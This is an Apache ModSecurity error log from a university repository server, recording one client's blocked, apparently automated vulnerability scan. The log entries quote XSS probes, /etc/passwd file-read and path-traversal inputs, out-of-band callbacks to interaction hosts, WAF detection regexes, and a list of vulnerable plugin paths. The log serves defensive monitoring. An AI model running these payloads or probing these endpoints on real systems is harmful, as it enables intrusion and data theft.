[Tue Aug 29 11:53:09.662844 2023] [:error] [pid 2593] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:currentpath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:currentpath: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15tcCo-f0AAAohZ6oAAAAZ"]
[Tue Aug 29 11:53:10.821257 2023] [:error] [pid 2592] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keywords. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /\\x0d*/ found within ARGS:keywords: <input/Autofocus/\\x0d*/Onfocus=alert(123);>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/tour-list/"] [unique_id "ZO15tsCo-f0AAAog@CgAAAAY"]
[Tue Aug 29 11:53:11.919518 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:customctid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:customctid: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/webadmin/policy/category_table_ajax.php"] [unique_id "ZO15t8Co-f0AAAolKUIAAAAe"]
[Tue Aug 29 11:53:12.027538 2023] [:error] [pid 2593] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:redirect. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x0d\\x0a\\x0d\\x0a< found within ARGS:redirect: setting.htm\\x0d\\x0a\\x0d\\x0a<script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/man.cgi"] [unique_id "ZO15uMCo-f0AAAohZ68AAAAZ"]
[Tue Aug 29 11:53:12.561331 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:gallery_current_index. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:gallery_current_index: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15uMCo-f0AAAnd3QoAAAAI"]
[Tue Aug 29 11:53:12.935169 2023] [:error] [pid 2598] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:FirstName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:FirstName: <img src onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/crm-perks-forms/templates/sample_file.php"] [unique_id "ZO15uMCo-f0AAAoml18AAAAf"]
[Tue Aug 29 11:53:14.497053 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:Filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '></ found within ARGS:Filename: Filename'></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/podcast-channels/getid3/demos/demo.write.php"] [unique_id "ZO15usCo-f0AAAfWOVUAAAAL"]
[Tue Aug 29 11:53:14.693297 2023] [:error] [pid 2592] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me/ found within TX:1: oast.me/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/Images/Remote"] [unique_id "ZO15usCo-f0AAAog@DMAAAAY"]
[Tue Aug 29 11:53:15.785875 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://oast.me/ found within TX:1: oast.me/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/Items/RemoteSearch/Image"] [unique_id "ZO15u8Co-f0AAAolKU0AAAAe"]
[Tue Aug 29 11:53:16.552232 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);} found within ARGS:token: asdf\\x22);}alert(document.domain); function asdf() {//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/atutor/login.php"] [unique_id "ZO15vMCo-f0AAAowNm0AAAAH"]
[Tue Aug 29 11:53:17.790746 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh/ found within TX:1: interact.sh/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/brandfolder/callback.php"] [unique_id "ZO15vcCo-f0AAAnTlbkAAAAA"]
[Tue Aug 29 11:53:18.817184 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/dompdf.php"] [unique_id "ZO15vsCo-f0AAAni-C8AAAAU"]
[Tue Aug 29 11:53:19.572675 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:post. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:post: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php"] [unique_id "ZO15v8Co-f0AAAox7FgAAAAN"]
[Tue Aug 29 11:53:19.938993 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/PhpSpreadsheet/Writer/PDF/DomPDF.php"] [unique_id "ZO15v8Co-f0AAAnTlcEAAAAA"]
[Tue Aug 29 11:53:19.939678 2023] [:error] [pid 2583] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:"/><script>alert(1)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22/><script>alert(1)</script>: \\x22/><script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15v8Co-f0AAAoXJv0AAAAP"]
[Tue Aug 29 11:53:20.687864 2023] [:error] [pid 2603] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/lib/dompdf/dompdf.php"] [unique_id "ZO15wMCo-f0AAAor7rQAAAAk"]
[Tue Aug 29 11:53:21.619289 2023] [:error] [pid 2583] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/includes/dompdf/dompdf.php"] [unique_id "ZO15wcCo-f0AAAoXJwQAAAAP"]
[Tue Aug 29 11:53:22.535898 2023] [:error] [pid 2602] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php"] [unique_id "ZO15wsCo-f0AAAoqbRwAAAAj"]
[Tue Aug 29 11:53:23.301342 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:movie_param. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:movie_param: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/avchat-3/index_popup.php"] [unique_id "ZO15w8Co-f0AAAox7GQAAAAN"]
[Tue Aug 29 11:53:23.383082 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15w8Co-f0AAAoW7PgAAAAJ"]
[Tue Aug 29 11:53:23.899189 2023] [:error] [pid 2590] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php"] [unique_id "ZO15w8Co-f0AAAoesN8AAAAV"]
[Tue Aug 29 11:53:24.758602 2023] [:error] [pid 2592] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php"] [unique_id "ZO15xMCo-f0AAAog@FAAAAAY"]
[Tue Aug 29 11:53:24.786337 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:urls[<img src=x onerror=alert(document.domain)>]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS_NAMES:urls[<img src=x onerror=alert(document.domain)>]: urls[<img src=x onerror=alert(document.domain)>]"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15xMCo-f0AAAowNowAAAAH"]
[Tue Aug 29 11:53:25.697417 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/post-pdf-export/dompdf/dompdf.php"] [unique_id "ZO15xcCo-f0AAAowNo4AAAAH"]
[Tue Aug 29 11:53:25.928350 2023] [:error] [pid 2612] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:query: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/search"] [unique_id "ZO15xcCo-f0AAAo0gNsAAAAZ"]
[Tue Aug 29 11:53:27.544703 2023] [:error] [pid 2603] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/blogtopdf/dompdf/dompdf.php"] [unique_id "ZO15x8Co-f0AAAor7sUAAAAk"]
[Tue Aug 29 11:53:27.841073 2023] [:error] [pid 2603] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/gboutique/library/dompdf/dompdf.php"] [unique_id "ZO15x8Co-f0AAAor7sgAAAAk"]
[Tue Aug 29 11:53:27.843200 2023] [:error] [pid 2590] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-content/plugins/wp-swimteam/include/user/download.php"] [unique_id "ZO15x8Co-f0AAAoesOcAAAAV"]
[Tue Aug 29 11:53:28.055692 2023] [:error] [pid 2592] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:module. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:module: module\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/mods/clansphere/lang_modvalidate.php"] [unique_id "ZO15yMCo-f0AAAog@GAAAAAY"]
